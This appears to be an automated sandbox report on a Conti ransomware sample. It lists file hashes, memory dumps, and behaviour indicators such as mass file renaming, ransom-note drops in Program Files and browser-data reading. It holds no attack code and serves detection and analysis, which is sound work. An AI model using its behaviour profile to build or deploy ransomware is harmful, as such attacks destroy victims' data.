memory/2524-6141-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2524-6796-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2524-6795-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Roaming\779389082

MD5 ba41580a52e592f902ce53d5bf4eaddc
SHA1 463acff5a71dd7c580b7ae52091dc5ec3075fb0a
SHA256 50577e8ae3331aa6d25cfb4a270291ee3503d88febca708d9de04b796ee694df
SHA512 4697440accd08c20b9807471d6443f827f001ef4bbb733f2323d29cb4613bfc944f0798d5b3a2502931826898a3ff0255f0e62118445118e296bdb2e92b77086

C:\Users\Admin\AppData\Local\Temp\Cab8317.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar83F4.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2b90448ce29f4e674788aeb7ad767303
SHA1 9b8f30a99850feb5d15a34adf623460628cc8468
SHA256 38ac14ad85a09c9f1390823699b30156c4f3b5220566afd2ba971270cb2d5c3d
SHA512 0187c6d45549d7cda4b76634a3e49bb1093d52aa6db97ad57c69049de908927f2af6afbc7dd492dd4f8f85a20dce62b4c90ce06ed342e1ebdba62155cfe76945

memory/2812-18827-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-18905-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-18907-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1260-18906-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Roaming\779389082

MD5 df63728d68a4ac8b176671b22e5b3b76
SHA1 839728f505861e48749e9ee81210cca4125d3537
SHA256 bd1aa34af510bdbe455df7e883e3ab3d2a220a703fffe872e13d2167519f311e
SHA512 6e6878f30d7dfa2aae6eb6a874852df9c440c9a3257d4dba97176706c4b68cfceec1dc3eabf8d02329b2fbca7a4f7995ebd944f1926e19b689bf5d3ff850fb50

C:\Users\Admin\AppData\Roaming\779389082

MD5 8e7e18c8210e7d646ba907dc2cfa4a6b
SHA1 4255763de5f28bf6fd0d8fedecdcfd2404640c2d
SHA256 8ffe6a6cebda792b30d97a1a63c83022eb68e40cbe707e6d17dd02dce7af63a1
SHA512 a8f977c603ea40b17afbad99f734e3bf3a0b51d0c2e4680508d3b23c555794c8b7031a4c8df39b65ba9f29ee84f154c37475b0b30bc70bc897871d15043ec996

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\779389082

MD5 4a3b09bfb912f280a4aa4b8dc4b58862
SHA1 bd37c1b38e009f035e16ca6f4c73d730508f8e5e
SHA256 f640cf30c960268b2b2e27ee202a5d7474b5da127b3c9374724166858c24a8a7
SHA512 76ad7cf9f6f14d7d51e22b231e60fd6f42f3683ec921d19ff886e8e54ba7518ebdc88942b0d546200983949c56d8dc9067833f84803737e66d56891a4e2efeb2

C:\Users\Admin\AppData\Roaming\779389082

MD5 9b0399133aed66f49a14ff6a227f88d4
SHA1 ab030c6437390e573b9dc2e7a60a8db193264422
SHA256 8dae63d671d34974468b6d9f39b75ad69fc20fb513606f93f82ddcd4b61a3f3c
SHA512 176f1d0358fe911bb1a23e33e66cd5021453a91f5a33b399930c2338ba46e3719326aefbdaab4ba198408c6a4aa889d4b6809d115b37309fc4271b922666a546

C:\Users\Admin\AppData\Roaming\779389082

MD5 c5da74a39363bc6170af60df8b32c49f
SHA1 2c129125a373564ce77d4ac4475c8a887566ae8c
SHA256 544e5401fc63101ff7383fb4b696ab1d5b4a55071c7ea463237633c574621384
SHA512 76e26c133adc776df9063c0c852fd3b57d98aa97f764dff880440594ba1d32318e3ebe3989b927eb78b0564674d86f313836ae1e47c459a9a881d26789760bb7

C:\Users\Admin\AppData\Roaming\779389082

MD5 fe292e7917d830e18d27a3998fca1ec3
SHA1 bac8235e38cb0568b13f26d945bee18257b38a46
SHA256 62cd2f8be0163a0cf04bfd27b24b23149574d8c1226389dfa1bff638f8394651
SHA512 148e60e57982d79695fe3cb8361a3580e321b8872bd2f232262a0aa46aa28d1bf51be3cf32bcc5c80a2093b6f2a7cf68f80e5705b46bb2eb71d0212844e2d82b

C:\Users\Admin\AppData\Roaming\779389082

MD5 0f33a9748ef0bb30d30b783bdc83a99c
SHA1 1a7fbc4b6e0cde24f7ee58eb45627c1641c989fa
SHA256 aa93019b5bcc01adf7726d6f15aee83ea62cbc14f327e59f02a9a2342eb58e30
SHA512 0f17a23dbf1251ec90291d54e4c8bacbd231c4809368fa0aa7d733c523174de43ad319eb098a7120ae9b60400894cf83b7eecb401744c36ec0e1fd5e4d6f2ca1

C:\Users\Admin\AppData\Roaming\779389082

MD5 a524ebe0dfab9ea297286050d66ba1ed
SHA1 665c7d801635dd431f3d97f08baf14b9daf8a6e1
SHA256 4a095728d509404987228dc20d6e23db732f4a0ec6c66b0cf89699926b5ed3f6
SHA512 a924e8ba45d96c7193c9a61b2f1753bbaa48beeeb1a9058974534bb1fb58aa213841c6c729b414016d0c00fa7b1eca08da862a9fd045e3e5455aba826ba5c1c4

C:\Users\Admin\AppData\Roaming\779389082

MD5 2d17f934f25fa2afe05b03468cb39468
SHA1 7e1de8cb0b326438aa7a7e3dc2168579615dcd8d
SHA256 1c07aeddbabbf1775679040612da2e23ece91fc59f04b54bbf8a3c13c4baf8b3
SHA512 b79fc2195d752e62b1afd6bbccf745facd9f47442a7a843d55892189770914fc201fc75ed12c36cb2e53323396543ac68a405a0bdac973c21b5cee3a8d956bca

C:\Users\Admin\AppData\Roaming\779389082

MD5 32e8ec4346f13ce0568de7bf7fefb6fe
SHA1 ad04279bd0147432c997ebe0d52fd80d662b2f8d
SHA256 cf0ab6f8beb2f23ee9b75633ed2faaf82f14fa3ed797d8407a6a841b6e94d227
SHA512 2abbe29c8f7342779da0ada5ce245a76e6c2f3b601615407e8924f847327063b09455233727562bb4367500b73ebe22ff0a2ff3257dd23f07f38b20ad2242199

C:\Users\Admin\AppData\Roaming\779389082

MD5 79ecf11a4c0e2c95c2cb132dd124da9d
SHA1 2d36fc5b1a614127b5699e257c9df7ebc9fd7f0a
SHA256 8cffbaceb7c043551fef7b20ab7d5ce465c00e656980fc8bff19e1bc7f03b235
SHA512 92bef0f9e1c521e05b37187c47f69a8fd9ea842c2c964613be798e528fc70eae15e18fcb5489176529c6ab546715a55b47f08dbeb141d998c8a8f993fee36c62

Analysis: behavioral14

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1709s

Max time network

1164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Renames multiple (7310) files with added filename extension

ransomware

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\VisualElements\SmallLogoCanary.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OMML2MML.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-140.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\meta\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Locales\de.pak C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690Nmerical.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\fi-FI\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hi.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
